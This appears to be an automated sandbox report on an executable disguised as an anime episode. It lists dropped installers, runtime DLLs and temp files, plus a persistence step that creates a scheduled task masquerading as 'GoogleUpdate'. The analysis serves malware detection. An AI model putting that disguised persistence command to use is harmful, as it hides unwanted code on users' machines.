Source: C:\Users\user\Desktop\Boku no Hero Academia 6th Season - Episode 13.exeFile created: C:\Users\user\AppData\Local\Temp\is-4VP2B.tmp\Boku no Hero Academia 6th Season - Episode 13.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: 3cd71a.rbf (copy)Jump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: 3cd70f.rbf (copy)Jump to dropped file
Source: C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exeFile created: C:\Windows\Temp\{52175C1E-180F-452E-83F2-4EF07DAE0BCF}\.be\VC_redist.x64.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-8STSI.tmp\VC_redist.x64.exeFile created: C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exeJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: 3cd717.rbf (copy)Jump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\System32\msvcp140_codecvt_ids.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: 3cd723.rbf (copy)Jump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\System32\vcamp140.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: 3cd710.rbf (copy)Jump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\System32\vcruntime140.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-4N7PP.tmp\Boku no Hero Academia 6th Season - Episode 13.tmpFile created: C:\Users\user\AppData\Local\Temp\is-8STSI.tmp\is-DLQHQ.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: 3cd720.rbf (copy)Jump to dropped file
Source: C:\Windows\Temp\{52175C1E-180F-452E-83F2-4EF07DAE0BCF}\.be\VC_redist.x64.exeFile created: C:\ProgramData\Package Cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\VC_redist.x64.exeJump to dropped file
Source: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exeFile created: C:\Windows\Temp\{36CC976F-BDDA-47B0-BB5A-7568B395BA2A}\.ba\wixstdba.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\System32\msvcp140_1.dllJump to dropped file
Source: C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exeFile created: C:\Windows\Temp\{52175C1E-180F-452E-83F2-4EF07DAE0BCF}\.ba\wixstdba.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: 3cd721.rbf (copy)Jump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: 3cd709.rbf (copy)Jump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: 3cd719.rbf (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-4N7PP.tmp\Boku no Hero Academia 6th Season - Episode 13.tmpFile created: C:\Users\user\AppData\Local\Temp\is-8STSI.tmp\VC_redist.x64.exe (copy)Jump to dropped file
Source: C:\ProgramData\Package Cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\VC_redist.x64.exeFile created: C:\Users\user\AppData\Local\Temp\{9B8C7EDA-2539-42FC-9E66-AE939366FE45}\.ba\wixstdba.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\System32\mfc140kor.dllJump to dropped file
Source: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exeFile created: C:\Windows\Temp\{7B1AA818-8405-4B0F-ACAF-0273ABC8852E}\.ba\wixstdba.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\System32\mfc140jpn.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\System32\msvcp140_2.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\System32\mfc140ita.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\System32\mfc140esn.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\System32\mfc140deu.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\System32\mfc140u.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\System32\msvcp140.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\System32\mfc140chs.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\System32\mfcm140u.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\System32\mfc140enu.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\System32\mfc140.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\System32\concrt140.dllJump to dropped file
Source: C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exeFile created: C:\Windows\Temp\{52175C1E-180F-452E-83F2-4EF07DAE0BCF}\.be\VC_redist.x64.exeJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\System32\mfc140fra.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-8STSI.tmp\VC_redist.x64.exeFile created: C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exeJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\System32\msvcp140_codecvt_ids.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\System32\vccorlib140.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\System32\vcamp140.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\System32\vcruntime140.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\System32\vcruntime140_1.dllJump to dropped file
Source: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exeFile created: C:\Windows\Temp\{36CC976F-BDDA-47B0-BB5A-7568B395BA2A}\.ba\wixstdba.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\System32\msvcp140_atomic_wait.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\System32\vcomp140.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\System32\msvcp140_1.dllJump to dropped file
Source: C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exeFile created: C:\Windows\Temp\{52175C1E-180F-452E-83F2-4EF07DAE0BCF}\.ba\wixstdba.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\System32\mfc140cht.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\System32\mfc140rus.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\System32\mfcm140.dllJump to dropped file
Source: C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exeFile created: C:\Windows\Temp\{52175C1E-180F-452E-83F2-4EF07DAE0BCF}\.ba\license.rtfJump to behavior
Source: C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exeFile created: C:\Windows\Temp\{52175C1E-180F-452E-83F2-4EF07DAE0BCF}\.ba\1028\license.rtfJump to behavior
Source: C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exeFile created: C:\Windows\Temp\{52175C1E-180F-452E-83F2-4EF07DAE0BCF}\.ba\1029\license.rtfJump to behavior
Source: C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exeFile created: C:\Windows\Temp\{52175C1E-180F-452E-83F2-4EF07DAE0BCF}\.ba\1031\license.rtfJump to behavior
Source: C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exeFile created: C:\Windows\Temp\{52175C1E-180F-452E-83F2-4EF07DAE0BCF}\.ba\1036\license.rtfJump to behavior
Source: C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exeFile created: C:\Windows\Temp\{52175C1E-180F-452E-83F2-4EF07DAE0BCF}\.ba\1040\license.rtfJump to behavior
Source: C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exeFile created: C:\Windows\Temp\{52175C1E-180F-452E-83F2-4EF07DAE0BCF}\.ba\1041\license.rtfJump to behavior
Source: C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exeFile created: C:\Windows\Temp\{52175C1E-180F-452E-83F2-4EF07DAE0BCF}\.ba\1042\license.rtfJump to behavior
Source: C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exeFile created: C:\Windows\Temp\{52175C1E-180F-452E-83F2-4EF07DAE0BCF}\.ba\1045\license.rtfJump to behavior
Source: C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exeFile created: C:\Windows\Temp\{52175C1E-180F-452E-83F2-4EF07DAE0BCF}\.ba\1046\license.rtfJump to behavior
Source: C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exeFile created: C:\Windows\Temp\{52175C1E-180F-452E-83F2-4EF07DAE0BCF}\.ba\1049\license.rtfJump to behavior
Source: C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exeFile created: C:\Windows\Temp\{52175C1E-180F-452E-83F2-4EF07DAE0BCF}\.ba\1055\license.rtfJump to behavior
Source: C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exeFile created: C:\Windows\Temp\{52175C1E-180F-452E-83F2-4EF07DAE0BCF}\.ba\2052\license.rtfJump to behavior
Source: C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exeFile created: C:\Windows\Temp\{52175C1E-180F-452E-83F2-4EF07DAE0BCF}\.ba\3082\license.rtfJump to behavior
Source: C:\ProgramData\Package Cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\VC_redist.x64.exeFile created: C:\Users\user\AppData\Local\Temp\{9B8C7EDA-2539-42FC-9E66-AE939366FE45}\.ba\license.rtf
Source: C:\ProgramData\Package Cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\VC_redist.x64.exeFile created: C:\Users\user\AppData\Local\Temp\{9B8C7EDA-2539-42FC-9E66-AE939366FE45}\.ba\1028\license.rtf
Source: C:\ProgramData\Package Cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\VC_redist.x64.exeFile created: C:\Users\user\AppData\Local\Temp\{9B8C7EDA-2539-42FC-9E66-AE939366FE45}\.ba\1029\license.rtf
Source: C:\ProgramData\Package Cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\VC_redist.x64.exeFile created: C:\Users\user\AppData\Local\Temp\{9B8C7EDA-2539-42FC-9E66-AE939366FE45}\.ba\1031\license.rtf
Source: C:\ProgramData\Package Cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\VC_redist.x64.exeFile created: C:\Users\user\AppData\Local\Temp\{9B8C7EDA-2539-42FC-9E66-AE939366FE45}\.ba\1036\license.rtf
Source: C:\ProgramData\Package Cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\VC_redist.x64.exeFile created: C:\Users\user\AppData\Local\Temp\{9B8C7EDA-2539-42FC-9E66-AE939366FE45}\.ba\1040\license.rtf
Source: C:\ProgramData\Package Cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\VC_redist.x64.exeFile created: C:\Users\user\AppData\Local\Temp\{9B8C7EDA-2539-42FC-9E66-AE939366FE45}\.ba\1041\license.rtf
Source: C:\ProgramData\Package Cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\VC_redist.x64.exeFile created: C:\Users\user\AppData\Local\Temp\{9B8C7EDA-2539-42FC-9E66-AE939366FE45}\.ba\1042\license.rtf
Source: C:\ProgramData\Package Cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\VC_redist.x64.exeFile created: C:\Users\user\AppData\Local\Temp\{9B8C7EDA-2539-42FC-9E66-AE939366FE45}\.ba\1045\license.rtf
Source: C:\ProgramData\Package Cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\VC_redist.x64.exeFile created: C:\Users\user\AppData\Local\Temp\{9B8C7EDA-2539-42FC-9E66-AE939366FE45}\.ba\1046\license.rtf
Source: C:\ProgramData\Package Cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\VC_redist.x64.exeFile created: C:\Users\user\AppData\Local\Temp\{9B8C7EDA-2539-42FC-9E66-AE939366FE45}\.ba\1049\license.rtf
Source: C:\ProgramData\Package Cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\VC_redist.x64.exeFile created: C:\Users\user\AppData\Local\Temp\{9B8C7EDA-2539-42FC-9E66-AE939366FE45}\.ba\1055\license.rtf
Source: C:\ProgramData\Package Cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\VC_redist.x64.exeFile created: C:\Users\user\AppData\Local\Temp\{9B8C7EDA-2539-42FC-9E66-AE939366FE45}\.ba\2052\license.rtf
Source: C:\ProgramData\Package Cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\VC_redist.x64.exeFile created: C:\Users\user\AppData\Local\Temp\{9B8C7EDA-2539-42FC-9E66-AE939366FE45}\.ba\3082\license.rtf
Source: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exeFile created: C:\Windows\Temp\{36CC976F-BDDA-47B0-BB5A-7568B395BA2A}\.ba\license.rtf
Source: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exeFile created: C:\Windows\Temp\{36CC976F-BDDA-47B0-BB5A-7568B395BA2A}\.ba\1028\license.rtf
Source: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exeFile created: C:\Windows\Temp\{36CC976F-BDDA-47B0-BB5A-7568B395BA2A}\.ba\1029\license.rtf
Source: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exeFile created: C:\Windows\Temp\{36CC976F-BDDA-47B0-BB5A-7568B395BA2A}\.ba\1031\license.rtf
Source: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exeFile created: C:\Windows\Temp\{36CC976F-BDDA-47B0-BB5A-7568B395BA2A}\.ba\1036\license.rtf
Source: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exeFile created: C:\Windows\Temp\{36CC976F-BDDA-47B0-BB5A-7568B395BA2A}\.ba\1040\license.rtf
Source: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exeFile created: C:\Windows\Temp\{36CC976F-BDDA-47B0-BB5A-7568B395BA2A}\.ba\1041\license.rtf
Source: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exeFile created: C:\Windows\Temp\{36CC976F-BDDA-47B0-BB5A-7568B395BA2A}\.ba\1042\license.rtf
Source: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exeFile created: C:\Windows\Temp\{36CC976F-BDDA-47B0-BB5A-7568B395BA2A}\.ba\1045\license.rtf
Source: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exeFile created: C:\Windows\Temp\{36CC976F-BDDA-47B0-BB5A-7568B395BA2A}\.ba\1046\license.rtf
Source: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exeFile created: C:\Windows\Temp\{36CC976F-BDDA-47B0-BB5A-7568B395BA2A}\.ba\1049\license.rtf
Source: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exeFile created: C:\Windows\Temp\{36CC976F-BDDA-47B0-BB5A-7568B395BA2A}\.ba\1055\license.rtf
Source: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exeFile created: C:\Windows\Temp\{36CC976F-BDDA-47B0-BB5A-7568B395BA2A}\.ba\2052\license.rtf
Source: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exeFile created: C:\Windows\Temp\{36CC976F-BDDA-47B0-BB5A-7568B395BA2A}\.ba\3082\license.rtf
Source: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exeFile created: C:\Windows\Temp\{7B1AA818-8405-4B0F-ACAF-0273ABC8852E}\.ba\license.rtf
Source: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exeFile created: C:\Windows\Temp\{7B1AA818-8405-4B0F-ACAF-0273ABC8852E}\.ba\1028\license.rtf
Source: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exeFile created: C:\Windows\Temp\{7B1AA818-8405-4B0F-ACAF-0273ABC8852E}\.ba\1029\license.rtf
Source: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exeFile created: C:\Windows\Temp\{7B1AA818-8405-4B0F-ACAF-0273ABC8852E}\.ba\1031\license.rtf
Source: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exeFile created: C:\Windows\Temp\{7B1AA818-8405-4B0F-ACAF-0273ABC8852E}\.ba\1036\license.rtf
Source: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exeFile created: C:\Windows\Temp\{7B1AA818-8405-4B0F-ACAF-0273ABC8852E}\.ba\1040\license.rtf
Source: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exeFile created: C:\Windows\Temp\{7B1AA818-8405-4B0F-ACAF-0273ABC8852E}\.ba\1041\license.rtf
Source: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exeFile created: C:\Windows\Temp\{7B1AA818-8405-4B0F-ACAF-0273ABC8852E}\.ba\1042\license.rtf
Source: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exeFile created: C:\Windows\Temp\{7B1AA818-8405-4B0F-ACAF-0273ABC8852E}\.ba\1045\license.rtf
Source: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exeFile created: C:\Windows\Temp\{7B1AA818-8405-4B0F-ACAF-0273ABC8852E}\.ba\1046\license.rtf
Source: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exeFile created: C:\Windows\Temp\{7B1AA818-8405-4B0F-ACAF-0273ABC8852E}\.ba\1049\license.rtf
Source: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exeFile created: C:\Windows\Temp\{7B1AA818-8405-4B0F-ACAF-0273ABC8852E}\.ba\1055\license.rtf
Source: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exeFile created: C:\Windows\Temp\{7B1AA818-8405-4B0F-ACAF-0273ABC8852E}\.ba\2052\license.rtf
Source: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exeFile created: C:\Windows\Temp\{7B1AA818-8405-4B0F-ACAF-0273ABC8852E}\.ba\3082\license.rtf

Boot Survival

barindex
Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /Create /XML "C:\Users\user\AppData\Local\WindowsApp\reg.xml" /tn GoogleUpdate
Source: C:\Users\user\Desktop\Boku no Hero Academia 6th Season - Episode 13.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-4VP2B.tmp\Boku no Hero Academia 6th Season - Episode 13.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-4VP2B.tmp\Boku no Hero Academia 6th Season - Episode 13.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-4VP2B.tmp\Boku no Hero Academia 6th Season - Episode 13.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-4VP2B.tmp\Boku no Hero Academia 6th Season - Episode 13.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-4VP2B.tmp\Boku no Hero Academia 6th Season - Episode 13.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-4VP2B.tmp\Boku no Hero Academia 6th Season - Episode 13.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-4VP2B.tmp\Boku no Hero Academia 6th Season - Episode 13.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-4VP2B.tmp\Boku no Hero Academia 6th Season - Episode 13.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Boku no Hero Academia 6th Season - Episode 13.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-4N7PP.tmp\Boku no Hero Academia 6th Season - Episode 13.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-4N7PP.tmp\Boku no Hero Academia 6th Season - Episode 13.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-4N7PP.tmp\Boku no Hero Academia 6th Season - Episode 13.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-4N7PP.tmp\Boku no Hero Academia 6th Season - Episode 13.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-4N7PP.tmp\Boku no Hero Academia 6th Season - Episode 13.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-4N7PP.tmp\Boku no Hero Academia 6th Season - Episode 13.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-4N7PP.tmp\Boku no Hero Academia 6th Season - Episode 13.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-4N7PP.tmp\Boku no Hero Academia 6th Season - Episode 13.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-4N7PP.tmp\Boku no Hero Academia 6th Season - Episode 13.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-4N7PP.tmp\Boku no Hero Academia 6th Season - Episode 13.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-4N7PP.tmp\Boku no Hero Academia 6th Season - Episode 13.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Package Cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\VC_redist.x64.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\WindowsApp\InstallExtension.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\WindowsApp\InstallExtension.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: 3cd71e.rbf (copy)Jump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: 3cd70e.rbf (copy)Jump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: 3cd71b.rbf (copy)Jump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: 3cd708.rbf (copy)Jump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: 3cd718.rbf (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-4N7PP.tmp\Boku no Hero Academia 6th Season - Episode 13.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-8STSI.tmp\_isetup\_setup64.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: 3cd722.rbf (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-4VP2B.tmp\Boku no Hero Academia 6th Season - Episode 13.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-QUMRA.tmp\_isetup\_setup64.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: 3cd724.rbf (copy)Jump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: 3cd71f.rbf (copy)Jump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: 3cd70a.rbf (copy)Jump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: 3cd71a.rbf (copy)Jump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: 3cd70f.rbf (copy)Jump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: 3cd70b.rbf (copy)Jump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: 3cd717.rbf (copy)Jump to dropped file
